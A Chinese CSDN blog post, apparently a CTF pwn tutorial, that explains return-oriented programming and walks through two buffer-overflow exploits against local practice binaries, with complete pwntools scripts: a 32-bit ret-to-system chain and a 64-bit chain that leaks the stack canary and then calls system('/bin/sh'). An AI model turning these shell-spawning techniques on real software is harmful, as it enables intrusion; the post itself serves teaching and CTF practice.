rop链攻击实例

最新推荐文章于 2024-04-12 08:12:30 发布
最新推荐文章于 2024-04-12 08:12:30 发布
阅读量871 收藏 3
点赞数 1
文章标签: 网络 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dszfzzm/article/details/128237811
版权

rop链攻击原理

  • 在机器级编程中,调用函数的过程为:
    先从主函数跳转至被调用函数,此时栈空间中会保存被调用函数的临时变量,栈顶为返回地址,其下是传入该函数的参数。在被调用函数执行完毕后,会清理自己所使用的栈空间并返回之前的位值。因此被调用函数通常以ret指令结尾。
  • 而rop链即是基于以上原理,依靠ret指令获取程序控制权,从而达到一定的目的。

构造rop链的实例1(32位)

  • 首先checksec在这里插入图片描述
    发现只开启了nx保护
  • 静态分析在这里插入图片描述
    主函数中已调用system函数
    在这里插入图片描述
    vuln函数中存在栈溢出漏洞
    在这里插入图片描述
    偏移为32
  • 开始构造rop链
    • 在ida中查找所需的call system指令的地址
      在这里插入图片描述
    • 查找所需的‘/bin/sh’字段
      在这里插入图片描述
      因此可得exp
from pwn import *

r=process('./pwn')
system_addr=0x080491E7
binsh_addr=0x0804C024
offect=32
payload=(offect*'a').encode()+p32(system_addr)+p32(binsh_addr)
r.send(payload)
r.interactive()

构造rop链的实例2(64位)

  • checksec
    在这里插入图片描述
    发现存在canary 在这里插入图片描述
    存在于偏移为0x28处

  • 因此第一步先要泄露canary,然后进行溢出getshell

  • 接下来开始静态分析,寻找可以使用的函数和地址
    在这里插入图片描述
    存在两个read函数和一个printf函数,恰好可以完成泄露-溢出的操作。
    在这里插入图片描述
    在main函数中找到call _system指令
    在这里插入图片描述
    search找到/bin/sh字段
    由于这是64位程序,在调用函数时前6个参数保存在寄存器上,所以当我们需要将"/bin/sh"这个函数传给system的话,还需要获得一个寄存器的地址。
    利用ROPgadget工具
    在这里插入图片描述

  • 此时我们已经获取所需的所有信息,接下来开始编写exp

    from pwn import *
p=process('./pwn')
system_addr=0x0000000000401284
binsh_addr=0x0000000000404058
poprdi=0x00000000004011de
offset=0x28
leak_canary=(0x28-0x1)*'a'+'b'
p.sendlineafter("Go Go Go!!!",leak_canary)
p.recvuntil("ab")
canary=u64(p.recv(8))-0xa
print(hex(canary))

首先进行canary的泄露

这里需要注意的是如果利用sendline进行交互,会在输入的信息中加入’\n’,为了防止报错要将传入字段的长度减一。并且这个’\n’会将canary最后一位’\00’覆盖,因此要在得到的canary上再减去’\n’即0xa。

  • 此时得到了canary的值之后便开始进行溢出
    在这里插入图片描述

如图,由于数组s总长为0x38,减去canary前的0x28及canary本身的0x8,还需补充0x8个字符才能覆盖到返回地址

因此编写payload如下

payload=(offset*'a').encode()+p64(canary)+(0x8*'a').encode()+p64(poprdi)+p64(binsh_addr)+p64(system_addr)
  • 由此我们便可得到完整exp如下
from pwn import *
p=process('./pwn')
system_addr=0x0000000000401284
binsh_addr=0x0000000000404058
poprdi=0x00000000004011de
offset=0x28
leak_canary=(0x28-0x1)*'a'+'b'
p.sendlineafter("Go Go Go!!!",leak_canary)
p.recvuntil("ab")
canary=u64(p.recv(8))-0xa
print(hex(canary))
payload=(offset*'a').encode()+p64(canary)+(0x8*'a').encode()+p64(poprdi)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)
p.interactive()
  • 总结
    32位rop和64位rop在思路上高度一致,区别在于二者参数传递的方式,32位直接利用栈传参,而64位会优先利用寄存器传参。
    而rop栈溢出的思路也很单一,寻找溢出点,覆盖到返回地址,运行shellcode。
    但是这类题目在设置上可以做到很多样化,利用漏洞的不同,保护方式的不同,都可导致解题思路的变化。
dszfzzm
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
dropper:自动 ROP 生成器
06-15
滴管 自动 ROP 生成工具 dropper 旨在自动生成一个 ROP ,一旦注入到可执行文件的堆栈中,它就能生成一个 shell。 它处于开发的早期阶段,没有文档:( 它在引擎盖下使用 BARF 框架 [0](但实际上它仅适用于稍作修改的版本 [1])。 依赖关系 BARF(实际上是这个 fork[1]) 派尔夫工具 例子 from dropper import dropper dr = dropper.dropper('/bin/mv') dr.analyze_all() dr.add_shared_object('/lib/x86_64-linux-gnu/libc.so.6') dr.set_function_for_address_resolving('strrchr') pl = dr.build_spawn_shell_payload() 这里有一个小演示视频(分
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 2542
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实例ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实例可在CTF wiki上进行下载。
PWN基础之构造ROP(基本ROP
最新发布
qq_53058639的博客
04-12 797
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
linux内核rop姿势详解,[原创]rop攻击原理与思路(x86/x64)
weixin_42397925的博客
05-02 754
rop的基础原理rop是Return Oriented Programming(面向返回的编程)的缩写;根据函数调用规则,当刚跳转到其它函数去执行时,从被调用者的视角看:栈顶是返回地址,紧接着是自己的参数(X86架构下);然后,被调用者会对栈空间进行一系列操作,保存寄存器和存储临时变量,但在即将退出时会清理自己消耗的栈空间,以使其回到自己被调用前的栈空间,保持栈平衡;最后,被调用者以ret指令结...
7.pwn入门新手练习NX 栈不可执行的绕过方式--ROP
qiudalaojiao的博客
02-18 994
文件地址 提取码5o0a 我们先看看它开了那些保护 看到了 只开了nx 漏洞很明显 可以看到 buf 这个字符串数组只有0x80的大小,但是却可以 read 0x200 个字节 多出来的 0x200-0x80 就会造成溢出 32位程序默认调用函数的方式为先将参数压入栈中,靠近call指令的是第一个参数 而64位程序默认调用函数的方式则不同 RDI 中存放第1个参数 RSI 中存放第2个参数 RD...
计算机系统:Return Oriented Programming(ROP)详解——颠覆传统的攻击方式
m0_72410588的博客
08-31 628
在计算机领域,随着技术的不断发展,攻击者也在探索新的方式来突破系统的安全防线。其中一种被广泛讨论的攻击方式就是"Return Oriented Programming"(ROP,返回导向编程)。本文将深入探讨ROP的原理、应用以及对计算机系统安全的影响。
使用ROP攻击技术
热门推荐
海枫的专栏
09-28 3万+
随着64系统广泛应用,原来通过栈控制函数参数的方法已不再适用了,攻击提出ROP攻击,又展开了一场新的较量。
[网络安全自学篇] 五十五.Windows系统安全之构建ROP绕过DEP及原理详解
杨秀璋的专栏
03-03 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH的地址并反弹Shell。本文将讲解DEP堆栈执行保护机制,通过构造ROP来绕过DEP保护,重点利用VirtualProtect,最终编写漏洞利用脚本并实现自动化攻击。基础性文章,希望对您有所帮助。
深入探究64位rop构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶区welpwn
Kni9hT's Blog
03-20 1643
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一题做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
【CTF】初学ROP
刘家华(游戏开发)
04-25 158
win_function2为什么要返回到pop_ebp_ret,这里困扰我一直不能理解,单步跟踪后发现,原因是此函数有参数,当前函数执行ret后,此时栈顶是win_function2的参数,需要执行pop ebp将栈顶弹出,让栈顶指针指向vuln函数的地址,在利用ret跳转到到vuln函数,这就是pop ebp​;单步调试,观察内存中栈的变化,运行到ret指令,观察到ebp被pop成为了我们填充的aaaa,此时栈顶指针为我们覆盖的返回地址,此地址为win_function1的地址,该函数不需要参数。
rop轻松谈.pdf
10-21
rop基础
HDROP:使用性能监视计数器检测ROP攻击
03-20
HDROP:使用性能监视计数器检测ROP攻击
rop开放平台
04-12
rop开放平台s
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
ROP技术绕过DEP--MPlayer栈溢出漏洞
weixin_30251587的博客
06-02 449
一、前言 1.1 DEP介绍 数据执行保护 (DEP) 是一套软硬件技术,能够在内存上执行额外检查以防止在不可运行的内存区域上执行代码。 在 Microsoft Windows XP Service Pack 2、 Microsoft Windows Server 2003 Service Pack 1 、 Microsoft Windows XP Tablet PC Edition 2005...
x86 架构中的内存攻击技术 ROP(一)
个人笔记
04-05 1904
返回导向编程(Return-Oriented Programming,ROP)是一种高级的内存攻击技术,主要是为了绕过操作系统的防御手段 NX。该技术往往利用一些已有的漏洞,特别是缓冲区溢出,攻击者控制堆栈调用以劫持程序控制流并执行针对性的机器语言指令序列(gadgets),这些 gadget 组合,就能成功执行我们自己的逻辑。
pwn入门(3):缓冲区溢出ROP攻击(ret2syscall+ret2libc)
Bossfrank的博客
04-18 929
本节通过两个实例ret2tsyscall、ret2libc1,非常详细地为读者介绍基本的ROP攻击过程。对函数的调用、传参、返回的过程以及系统调用过程中对寄存器的赋值进行了详细阐释。
用verilog实现抵御ROP攻击的影子栈
06-23
抵御ROP攻击的影子栈可以用Verilog实现。下面是一些可能的实现细节: 1. 实现一个影子栈,该栈与程序执行中的原始栈并行。 2. 影子栈的大小应该和原始栈一样,需要在设计时确定。 3. 在程序执行期间,每次在原始栈...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值